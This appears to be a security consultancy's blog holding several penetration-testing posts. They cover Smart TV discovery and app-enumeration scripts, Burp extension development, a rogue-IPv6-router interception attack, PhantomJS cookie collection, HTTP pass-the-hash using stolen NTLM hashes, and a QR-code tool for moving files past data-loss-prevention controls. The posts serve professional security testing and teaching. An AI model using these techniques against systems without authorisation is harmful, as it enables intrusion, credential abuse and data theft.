Smart TV + Smartphone = Shiny New Attack Surfaces

According to a Gartner report from December 2012, “85 percent of all flat-panel TVs will be Internet-connected Smart TVs by 2016.” Forbes magazine offers some analysis of what is fueling this trend: http://www.forbes.com/sites/michaelwolf/2013/02/25/3-reasons-87-million-smart-tvs-will-be-sold-in-2013/ . The article mentions “DIAL”, an enabling technology for second-screen features (which this post is about). With these new devices come new risks, as evidenced in the following article: https://securityledger.com/2012/12/security-hole-in-samsung-smart-tvs-could-allow-remote-spying/ , as well as more recent research about Smart TV risks presented at the CanSecWest and DefCon security conferences this year (2013).

For more details about exactly what features a Smart TV has above and beyond a normal television, consult this Wikipedia article: http://en.wikipedia.org/wiki/Smart_TV.

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smartphones and tablets.  DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smartphone or tablet. This article will review sample code for discovering DIAL-capable devices on the network and enumerating the Smart TV apps they expose.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with an app for YouTube(tm), Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV. This allows you to control the TV apps from your smartphone. Using this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen”, controlling the first screen.

DIAL is the network protocol used for these features and is a standard developed jointly by Google and Netflix.  (See http://www.dial-multiscreen.org/ ).  DIAL stands for “Discovery and Launch”, which sounds vaguely similar to other network mechanisms such as RPC (remote procedure call). Basically, DIAL gives controller devices a way to quickly locate designated networked devices (TVs) and to launch programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on the network (turned on, of course) shows the magic square indicating a DIAL-enabled screen is available:

Square appears when the YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen to play YouTube videos. Recent versions of the YouTube apps allow “one touch pairing” which makes all of the setup easy for the user:


Let’s examine the traffic generated by the YouTube mobile app at launch.

  • The YouTube mobile app sends an initial SSDP request to discover available first-screen devices on the network.
  • The sent packet is destined for a multicast address (239.255.255.250) on UDP port 1900. Multicast is useful because devices on the local subnet can listen for it, even though it is not specifically sent to them.
  • The YouTube app multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling the YouTube mobile app its network address and information about how to access it.

A broadcast search request from the YouTube mobile app looks like this:

11:22:33.361831 IP my_phone.41742 > 239.255.255.250.1900: UDP, length 125
0x0010: .......l..+;M-SE
0x0020: ARCH.*.HTTP/1.1.
0x0030: .HOST:.239.255.2
0x0040: 55.250:1900..MAN
0x0050: :."ssdp:discover
0x0060: "..MX:.1..ST:.ur
0x0070: n:dial-multiscre
0x0080: en-org:service:d
0x0090: ial:1....

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of Python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal; the DIAL protocol specification has a full request packet example.)

#! /usr/bin/env python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5.0)
s.sendto("ST: urn:dial-multiscreen-org:service:dial:1",("239.255.255.250",1900))
while 1:
  try:
    data,addr = s.recvfrom(1024)
    print "[*] response from %s:%d" % addr
    print data
  except socket.timeout:
    break
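As noted, the request in the script above is pared down. The full M-SEARCH request (reconstructed here from the packet capture shown earlier) can be substituted as the payload; a sketch, with the request split out as a constant:

```python
import socket

# Full SSDP M-SEARCH request, reconstructed from the packet capture above.
MSEARCH = (
    'M-SEARCH * HTTP/1.1\r\n'
    'HOST: 239.255.255.250:1900\r\n'
    'MAN: "ssdp:discover"\r\n'
    'MX: 1\r\n'
    'ST: urn:dial-multiscreen-org:service:dial:1\r\n'
    '\r\n'
)

def discover(timeout=5.0):
    """Send an M-SEARCH and collect (address, response) pairs until timeout."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(MSEARCH.encode('ascii'), ('239.255.255.250', 1900))
    responses = []
    while True:
        try:
            data, addr = s.recvfrom(1024)
            responses.append((addr, data))
        except socket.timeout:
            break
    return responses
```

Swapping MSEARCH in for the bare ST line makes the probe match what the YouTube app itself sends on the wire.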

A response from a listening Smart TV on the network looks like:

[*] response from 192.168.1.222:1900
HTTP/1.1 200 OK
LOCATION: http://192.168.1.222:44047/dd.xml
CACHE-CONTROL: max-age=1800
EXT:
BOOTID.UPNP.ORG: 1
SERVER: Linux/2.6 UPnP/1.0 quick_ssdp/1.0
ST: urn:dial-multiscreen-org:service:dial:1
USN: uuid:bcb36992-2281-12e4-8000-006b9e40ad7d::urn:dial-multiscreen-org:service:dial:1

Notice that the TV returns a LOCATION header, with a URL: http://192.168.1.222:44047/dd.xml . The response from reading that URL leads to yet another URL which provides the “apps” link on the TV.

HTTP/1.1 200 OK
Content-Type: application/xml
Application-URL: http://192.168.1.222:60151/apps/
<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:r="urn:restful-tv-org:schemas:upnp-dd"> <specVersion> <major>1</major> <minor>0</minor> </specVersion>
<device> <deviceType>urn:schemas-upnp-org:device:tvdevice:1</deviceType> <friendlyName>Vizio DTV</friendlyName> <manufacturer>Vizio Inc.</manufacturer> <modelName>Vizio_E420i_A0</modelName>
<UDN>uuid:bcb36992-2281-12e4-8000-006b9e40ad7d</UDN> </device> </root>
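Pulling values like the LOCATION and Application-URL headers out of these responses is simple string handling. A small helper along these lines (the function name is mine, for illustration) covers both cases:

```python
def get_header(response_text, name):
    """Pull a header value out of an HTTP-style response (case-insensitive)."""
    for line in response_text.splitlines():
        if ':' in line:
            key, _, value = line.partition(':')
            if key.strip().lower() == name.lower():
                return value.strip()
    return None

# Usage against the SSDP response shown above:
#   get_header(ssdp_response, 'LOCATION')
# yields the dd.xml URL; fetching that URL (e.g. with urllib2.urlopen)
# returns the device description, whose Application-URL header is the
# base for per-app requests.
```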

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name, issuing a GET request to: http://192.168.1.222:60151/apps/YouTube . A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

HTTP/1.1 200 OK
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial">
<name>YouTube</name>
<options allowStop="false"/>
<state>stopped</state>
</service>
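The standard library's XML parser can pull the interesting fields out of that service document in a few lines; a sketch (the parse_service name is mine):

```python
import xml.etree.ElementTree as ET

# Namespace from the DIAL service document shown above.
DIAL_NS = '{urn:dial-multiscreen-org:schemas:dial}'

def parse_service(xml_bytes):
    """Return (name, state, allowStop) from a DIAL service document.

    Takes the raw response body as bytes, as read off the socket.
    """
    root = ET.fromstring(xml_bytes)
    name = root.findtext(DIAL_NS + 'name')
    state = root.findtext(DIAL_NS + 'state')
    options = root.find(DIAL_NS + 'options')
    allow_stop = options.get('allowStop') if options is not None else None
    return name, state, allow_stop
```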

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

  • The IP address of a Smart TV
  • The operating system of the Smart TV (Linux 2.6)
  • Two listening web services on random high ports.
  • A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013)  from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

#! /usr/bin/env python
#
# Enumerate apps on a SmartTV
# <arhodes@neohapsis.com>
#
import urllib2
import sys
apps=['YouTube','Netflix','iPlayer','News','Sport','Flingo','samba',
'tv.samba','launchpad','Pandora','Radio','Hulu','KontrolTV','tv.primeguide',
'primeguide','Tester','Olympus','com.dailymotion','Dailymotion','SnagFilms',
'Twonky TV','Turner-TNT-Leverage','Turner-TBS-BBT','Turner-NBA-GameTime',
'Turner-TNT-FallingSkies','WiDi','cloudmedia','freeott','popcornhour',
'Turner-TBS-TeamCoco','RedboxInstant','YuppTV.Remote','D-Smart','D-SmartBLU',
'Turner-CNN-TVE','Turner-HLN-TVE','Turner-CN-TVE','Turner-AS-TVE',
'Turner-TBS-TVE','Turner-TNT-TVE','Turner-TRU-TVE','Gladiator','com.lge',
'lge','JustMirroring','ConnectedRedButton','sling.player.googletv','Famium',
'tv.boxee.cloudee','freesat','freetime','com.humax','humax','HKTV',
'YahooScreen','reachplus','reachplus.alerts','com.reachplus.alerts',
'com.rockettools.pludly','Grooveshark','mosisApp','com.nuaxis.lifely',
'lifely','GuestEvolutionApp','ezktv','com.milesplit.tv','com.lookagiraffe.pong',
'Crunchyroll','Vimeo','vGet','ObsidianX','com.crossproduct.caster',
'com.crossproduct.ether','Aereo','testapp3e','com.karenberry.tv',
'cloudtv','Epictv','QuicTv','HyperTV','porn','pornz','Plex','Game',
'org.enlearn.Copilot','frequency', 'PlayMovies' ]
try:
  url = sys.argv[1]
except:
  print "Usage: %s tv_apps_url" % sys.argv[0]
  sys.exit(1)

for app in apps:
  try:
    u = urllib2.urlopen("%s/%s"%(url,app))
    print "%s:%s" % ( app, repr(str(u.headers)+u.read()) )
  except:
    pass

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:

 $ ./tvenum.py http://192.168.1.222:60151/apps/ 

YouTube:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>YouTube</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Netflix:'Content-Type: application/xml\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<service xmlns="urn:dial-multiscreen-org:schemas:dial">\r\n  <name>Netflix</name>\r\n  <options allowStop="false"/>\r\n  <state>stopped</state>\r\n</service>\r\n'

Hopefully this article has been informative for those who may be looking for new devices and attack surfaces to investigate during application or penetration testing.

 

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kinds of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is a very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments, and with the new extension API (released December 2012 in r1.5.01), a lot of the complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later, where some of the early bugs in extension support were worked out), and a recent version of Java.
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar”. (Even though the 2.7 branch is in beta, I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab, and configure the location of the Jython jar.
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system-wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()
            newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.
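As a concrete example of that kind of tweak: the request-editing itself is plain Python, independent of the Burp API. The helper below adds a (made-up) X-Signature header and mirrors the value into a JSON body; inside processHttpMessage you would feed its output to self._helpers.buildHttpMessage as in the demo extension above, which takes care of reassembling the message:

```python
import json

def sign_json_body(headers, body, signature):
    """Add a signature header and mirror it inside a JSON request body.

    'headers' is a plain list of header strings (as pulled from Burp's
    requestInfo.getHeaders()); 'X-Signature' is a hypothetical field name,
    standing in for whatever the target service requires.
    """
    new_headers = list(headers)
    new_headers.append('X-Signature: ' + signature)
    payload = json.loads(body) if body else {}
    payload['signature'] = signature
    return new_headers, json.dumps(payload)
```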

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds”, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.


This shell was originally intended to work with the classes and objects defined in jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.


Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services. SoapUI Pro even includes a variety of web-service specific payloads for security testing.

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducibility for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.


Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the SoapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are tons of tools out there, including the official Burp examples, burpextensions.com, and more findable on GitHub. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Picking Up The SLAAC With Sudden Six

By Brent Bandelgar and Scott Behrens

The people that run The Internet have been clamoring for years for increased adoption of IPv6, the next generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were ‘out of the box’ configured to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this IPv6 host router first, which would then resend the requests along to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.


Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that only have IPv4 connectivity and do not have IPv6 infrastructure and defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Attackers may take advantage of operating systems that prefer IPv6 traffic, forcing those hosts to route their traffic over the rogue IPv6 infrastructure so it can be intercepted and modified.

To boil it down, attackers can conceivably (and fairly easily) weaponize an attack on our systems simply by leveraging this vulnerability. They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine. Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).

As an example, we can imagine this type of attack being used to snoop on web traffic from employees browsing web sites.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be accomplished manually in each Network Adapter Properties panel or with GPO. Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. This includes using features such as RA Guard, which allows administrators to configure a trusted switch port that will accept IPv6 Router Advertisement packets, indicating the legitimate IPv6 router.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

Collecting Cookies with PhantomJS

TL;DR: Automate WebKit with PhantomJS to get specific Web site data.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes a JavaScript API for command execution. I was able to build on this script to produce a list of active and inactive URLs by checking the status callback from page.open, and to capture the cookies from every active URL as stored in the page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.onUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work, as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.


phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
  # output JSON of cookies from page, one JSON string per line
  # format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
  fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

HTTP Pass the Hash with Python

By: Ben Toews

TL;DR: Pass the Hash HTTP NTLM Authentication with Python – python-ntlm – requests

When assessing a Windows domain environment, the ability to “pass the hash” is invaluable. The technique was pioneered by Paul Ashton way back in ’97, and things have only gotten better since. Fortunately, we no longer need to patch Samba, but have reasonably functional tools like Pass-The-Hash Toolkit and msvctl.

The general approach of these tools is not to write PTH versions of every piece of Windows functionality, but rather to allow you to run Windows commands as another user. This means that instead of needing to patch Samba, we can just use msvctl to spawn cmd.exe and from there run the net use command. This approach has the obvious advantage of requiring far less code.

On a recent engagement, I was attempting to access SharePoint sites using stolen hashes. My first instinct was to launch iexplore.exe using msvctl and to try to browse to the target site. The first thing I learned is that in order to get Internet Explorer to do HTTP NTLM authentication without prompting for credentials, the site you are visiting needs to be in your “Trusted Sites Zone”. Four hours later, when you figure this out, IE will use HTTP NTLM authentication, with the hash specified by msvctl, to authenticate you to the web application. This was all great, except that I was still getting a 401 from the webapp. I authenticated, but the account I was using didn’t have permissions on the SharePoint site. No problem; I have stolen thousands of users’ hashes and one of them must work, right? But what am I going to do, use msvctl to launch a few thousand instances of IE and attempt to browse to the site with each? I think not…

I took the python-ntlm module, which allows for HTTP NTLM with urllib2, and added the ability to provide a hash instead of a password. This can be found here. Then, because urllib2 is one of my least favourite APIs, I decided to write a patch for the requests library to use the python-ntlm library. This fork can be found here. I submitted a pull request to the requests project and committed my change to python-ntlm. Hopefully both of these updates will be available from pip in the near future.

So, what does all this let you do? You can now do pass-the-hash authentication with Python’s requests library.
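The code sample from the original post didn’t survive the archive, so here is a hedged sketch of why hash-only authentication is possible at all: the NTLMv2 proof sent to the server is computed from the raw NT hash, never from the cleartext password (the patched python-ntlm performs essentially this computation; the variable names and dummy challenge/blob values below are illustrative, not from the library):

```python
import hashlib
import hmac

def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    # NTLMv2 key derivation (MS-NLMP): HMAC-MD5 keyed with the raw NT hash.
    # The cleartext password never appears -- hence "pass the hash".
    return hmac.new(nt_hash,
                    (user.upper() + domain).encode("utf-16-le"),
                    hashlib.md5).digest()

def ntlmv2_proof(nt_hash: bytes, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    # The 16-byte NTProofStr returned to the server during authentication.
    key = ntowf_v2(nt_hash, user, domain)
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()

# NT hash of "password" (a well-known test vector); challenge/blob are dummies.
nt_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
proof = ntlmv2_proof(nt_hash, "user", "DOMAIN", b"\x01" * 8, b"\x02" * 28)
```

With the patched libraries, the stolen hash is simply supplied in place of a password when constructing the auth object, and math like the above does the rest.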

One last thing to keep in mind is that HTTP NTLM authentication is distinct from Kerberos-based HTTP Negotiate authentication. This patch only supports the former.

DLP Circumvention: A Demonstration of Futility

By Ben Toews

TLDR: Check out the tool

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine it’s hard. The basic premise is to prevent employees or others from getting data out of a controlled environment: for example, preventing the DBA from stealing everyone’s credit card numbers, or the researcher from walking out the door with millions in trade secrets. New techniques for moving confidential data undetected through a network make DLP even tougher; after demonstrating that I could do it with QR Codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2D bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

I was talking with a former co-worker about this idea, and he went off and wrote an HTML5/JS encoder and an ffmpeg/bash/ruby decoder that seemed to work pretty well. Not wanting to be outdone, I kept going and wrote my own encoder and decoder.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.

The decoder was a little bit less straightforward. I have been wanting to learn about OpenCV for a non-security-related side project, so I decided to use it for this. It turns out that it is not entirely easy to use and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

  1. Pull images from the video and analyze their color.
  2. Identify the spaces between frames of QRCodes (identified by a solid color image).
  3. Pull the QRCode frames between these marker frames.
  4. Feed them into a ZBar ImageScanner and get the data out.
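The marker-frame logic in steps 2 and 3 can be sketched without OpenCV by treating each frame as its mean color; the real decoder does the same grouping on frames pulled from the video (the marker color and tolerance here are assumptions for illustration, not the tool’s actual values):

```python
# Group QR-code frames that fall between solid-color marker frames.
# Each frame is represented by its mean (R, G, B) color.
MARKER = (255, 0, 0)  # assumed solid marker color
TOLERANCE = 10        # per-channel tolerance for "solid marker" detection

def is_marker(frame, marker=MARKER, tol=TOLERANCE):
    # A frame counts as a marker if every channel is close to the marker color.
    return all(abs(a - b) <= tol for a, b in zip(frame, marker))

def split_on_markers(frames):
    # Collect runs of QR frames, using marker frames as the delimiters.
    groups, current = [], []
    for frame in frames:
        if is_marker(frame):
            if current:          # close out the group we were building
                groups.append(current)
                current = []
        else:
            current.append(frame)
    if current:
        groups.append(current)
    return groups
```

Each resulting group would then be handed to ZBar’s ImageScanner (step 4) to recover the encoded chunk.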

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but it serves to make a point. Feel free to download both the encoder and decoder from my GitHub Repo or check out the live demo and let me know what you think. I haven’t done any benchmarking for data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

